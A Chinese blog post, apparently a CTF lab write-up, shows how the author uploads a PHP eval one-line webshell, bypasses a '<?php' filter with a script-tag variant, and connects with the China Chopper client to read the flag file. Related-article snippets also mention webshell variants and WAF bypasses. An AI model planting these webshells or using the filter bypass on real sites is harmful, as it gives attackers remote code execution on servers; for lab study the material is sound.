菜刀的基本使用

最新推荐文章于 2024-05-12 12:44:55 发布
最新推荐文章于 2024-05-12 12:44:55 发布
阅读量1.5k 收藏 5
点赞数
分类专栏: web类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/101146229
版权

 

看到随便上传,想到一句话木马,然后上传一个

<?php eval($_POST['a']); ?>

然后显示上传成功,点击进去查看发现

 

没有成功,他屏蔽了<?php,几个字符。

发现还有另一种JS(javascript)脚本风格的写法

<script language="PHP"> @eval($_POST["code"]); </script>

上传之后发现成功了,页面没有东西了

 

这时候我们用菜刀链接,先复制URL

http://ff8f2ca7c55843c0a5a95e40485c10304d9a375250c54e9e.changame.ichunqiu.com/u/php.php

 

密码就是刚刚post的东西

 

然后右键文件管理

 

发现有个叫flag的文件,打开就是flag了

ChenZIDu
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中国菜刀使用
程序员伊成
10-27 5686
中国菜刀使用,为自己和新手一起分享的。大牛看了勿喷!         说到菜刀,我们第一想到的是一句话了。这里就说说一句话的类型,常常有的asp,aspx,php。         asp一句话:         aspx一句话:         php一句话:        这里写的只是常见的,在各个类型中还衍生了许多的变种一句话,我们在使用的时候,更改里面的"pas
菜刀的用法
小兴的学习笔记
12-13 1870
1.一句话木马 PHP //加容错代码 @eval($_POST['angel']) //绕过<?限制 //绕过某些限制 ASP ASPX 2.连接菜刀 如下图:右键--添加即可。 angel为 $_POST['angel']这里的angel相当于密码。 然后就可以操作了。 菜刀下载地址:菜刀
最新中国菜刀caidao-20160620
最新发布
seoppg的博客
05-12 776
2.1)文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;2.2)虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。2.3)数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL,ACCESS, 以及支持ADO方式连接的数据库。2.4) 自写脚本(只有Eval端才支持):通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
中国菜刀执行过程
weixin_34345560的博客
06-06 161
对于玩***的人来说 一句话 中国菜刀 肯定不陌生 那么菜刀到底是怎么样判断他的密码呢? 如何列目录的呢? 我们一一来进行科普下。一句话:<?php @eval($_POST[fuck])?>这是php的一句话密码。不懂的人来说 这怎么样是***呢? 这明明是正常的php语法。别着急,慢慢讲解。上面的一句话是服务端 也就是说 他等待post提交变量...
黑站利器——中国菜刀
snert的专栏
11-10 8255
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。 1.中国菜刀支持的服务端脚本:PHP、ASP、ASP.NET、JSP; 2.主要
一句话与中国菜刀的用法
netuser1937的博客
12-19 5306
一句话与中国菜刀的用法
Altman.mac.3.0.1.zip
02-18
9. **法律法规遵循**:在使用菜刀工具进行任何远程操作时,必须遵守相关法律法规,尊重他人的隐私权,避免非法入侵他人系统。 10. **更新与维护**:版本号3.0.1表明这是一个经过多次迭代和改进的产品,持续的更新和...
[其他类别]小小菜刀编辑器 2.0 For PHP_htmleditor.zip
03-18
【资料整理】这个文件名可能表示压缩包内包含的是关于小小菜刀编辑器2.0的使用教程、示例代码、配置文档等相关资料,这对于初学者或者想要深入了解编辑器特性的开发者来说非常有价值。 总的来说,【小小菜刀编辑器...
分享QQ邮箱中使用的在线编辑器
10-20
1. yl_editor.class.php:这可能是一个自定义编辑器类文件,包含了编辑器的基本操作函数,如初始化编辑器、获取和设置文本内容、执行格式化命令等。它可能是整个编辑器的核心逻辑部分,通过面向对象的方式组织代码,...
PHP、mysql(手工注入)
10-12
- SQL注入的基本原理是攻击者将构造的SQL命令嵌入到应用的查询语句中,使得原本正常的SQL语句变为恶意指令。 - 示例:一个简单的登录表单可能接收用户名和密码,如果未进行适当验证,攻击者可以通过输入如"admin' ...
ChopperMadness:游戏的第一个状态
06-13
"菜刀疯狂"作为游戏的暂定名称,可能暗示了游戏的核心元素:玩家将操控一把菜刀进行各种动作或挑战。游戏的第一个状态通常包含了基础框架和基本功能,例如游戏循环、角色移动和碰撞检测等。在这个阶段,开发者会专注...
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
中国菜刀使用方法
11-26 7175
中国菜刀使用方法 [attach]268[/attach] Asp环境: Php环境: Aspx环境: 是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,就让我慢慢
Python knife 一款伪菜刀
浅笑996的博客
12-05 1406
Python knife ​ 一款伪菜刀。 ​ 设计之初,本想只写个命令行的就可以了,但又想与众不同,想用python写代码,又不想用c#写前端(c#太卡了),万分无奈之下,找到一个替代品,Pyqt,所以我这个简易的菜刀就由此开始了。本程序实在python3下开发的。GUI界面用的Pyqt模块 既然想用pyqt做界面,第一步就是先装好pyqt, Python knife介绍视频 htt...
菜刀(代码执行)函数和命令执行函数详解及Getshell方法
dfdhxb995397的博客
06-11 878
i春秋作家:大家奥斯的哦 原文来自:https://bbs.ichunqiu.com/thread-41471-1-1.html 代码执行函数 VS 命令执行函数 一直想整理这两块的内容,但是一直没时间弄,直到前两天碰上一个写入了菜刀马但是死活连不上菜刀的站,顿时不知道怎么继续了,所以就趁这个机会整理了一下代码执行函数怎么getshell和命令执行函数怎么ge...
制作属于自己的过狗菜刀:为菜刀添加接口
weixin_30929195的博客
01-23 968
前言 中国菜刀是一个一句话连接工具,最后一版编译于20141213,时至今日仍然是一款优秀的工具。虽然菜刀本身在与服务器通信的时候做了二次编码,但到现在已经被各种WAF杀成狗。而菜刀也是没有开源的,今天就来给大家讲讲二次开发菜刀,为菜刀添加接口。 定位发送函数 下断点:HttpSendRequestW,连接一句话之后,断下来,查看调用堆栈。回溯发现call 0045B330调用了Htt...
中国菜刀使用(实战正确姿势)
weixin_49071539的博客
12-17 9841
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1. 准备制作图片马,随便找到一张图片重命名为1.jpg 2. 准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。 6. 可以看到上传
【Python】多线程getwebshell+存活检测+菜刀发包协议+源码分析
热门推荐
浪子燕青的博客
02-07 2万+
在此之前不得不先普及一下webshell存活检测的原理 为了我错了不少功课,对两款菜刀以及市面上3款webshell存活检测工具抓包分析 发现其中一款菜刀存在后门,3款webshell存活检测工具都存在后门 首先尝试抓包webshell存活检测 如图: 可以看到最下面是base64编码的代码,试着解码看看 结果为  @ini_set("display_errors","
Weevely(PHP菜刀)
公众号shadow sock7
12-12 1157
https://www.github.so/2018/05/25/weevely-guide/
buuctf菜刀666
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值